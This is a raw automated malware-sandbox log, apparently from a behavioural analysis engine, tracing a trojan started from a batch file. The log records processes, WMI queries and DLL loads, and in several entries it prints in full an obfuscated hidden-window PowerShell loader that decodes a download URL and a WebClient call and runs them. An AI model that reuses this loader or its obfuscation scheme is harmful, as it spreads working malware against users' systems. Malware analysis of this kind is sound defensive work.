Source: VC_redist.x64.exe.8.dr Static PE information: Section: .reloc ZLIB complexity 1.0107421875
Source: classification engine Classification label: mal100.spre.troj.evad.winCMD@14/164@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Fettle.Han Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dykonr4d.1i4.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7596
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7844
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
